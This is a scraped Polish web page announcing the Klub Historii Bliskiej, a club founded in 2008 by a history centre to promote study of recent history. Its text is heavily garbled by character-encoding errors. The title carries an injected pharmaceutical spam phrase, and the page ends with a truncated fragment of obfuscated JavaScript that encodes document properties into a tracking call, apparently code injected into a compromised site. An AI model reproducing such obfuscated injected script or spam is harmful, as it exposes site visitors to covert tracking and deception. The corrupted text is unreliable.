Klub Historii Bliskiej

Wstecz

Klub Historii Bliskiej what do cialis pills look like.

Podczas XII finaA�u konkursu „Historii Bliskiej”, 9 czerwca 2008, w siedzibie DSH oficjalnie powoA�ano do A?ycia Klub Historii Bliskiej. To nieformalne stowarzyszenie ma za zadanie propagowaA� poznawanie historii XX wieku metodami wypracowanymi przez OA�rodek KARTA podczas 12 lat trwania konkursu. Celem istnienia klubu jest zintegrowanie mA�odych uczestników konkursu, nauczycieli, opiekunów grup mA�odzieA?owych, dziennikarzy, historyków – pasjonatów i wszystkich ludzi zainteresowanych aktywnA� edukacjA� z zakresu historii najnowszej, która jest traktowana doA�A� pobieA?nie w szkolnym programie nauczania. CzA�onkowie Klubu otrzymywaA� bA�dA� wszechstronne wsparcie (broszury edukacyjne, spotkania, szkolenia metodyczne, etc.), bA�dA� mieli moA?liwoA�A� korzystania z zasobów DSH (Archiwum Historii Mówionej, Ikonografia, Filmoteka), wspóA�organizowaA� z DSH wA�asne imprezy edukacyjne, wpA�ywaA� na naszA� ofertA� programowA�. Uczestnictwo w Klubie jest dobrowolne i nie wiA�A?e siA� z A?adnymi obowiA�zkami. Chcemy, aby byA� to pewien ruch A�rodowiskowy, pomagajA�cy aktywizowaA� wszystkich miA�oA�ników zgA�A�biania „historii bliskiej” – w znaczeniu czasowym i przestrzennym.

Deklaracja przystA�pienia do Klubu >>>

Po wypeA�nieniu i podpisaniu formularza, prosimy o przesA�anie go na numer faxu: 022 827 67 51

WiA�cej o tegorocznej edycji konkursu „Historii Bliskiej” >>> f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}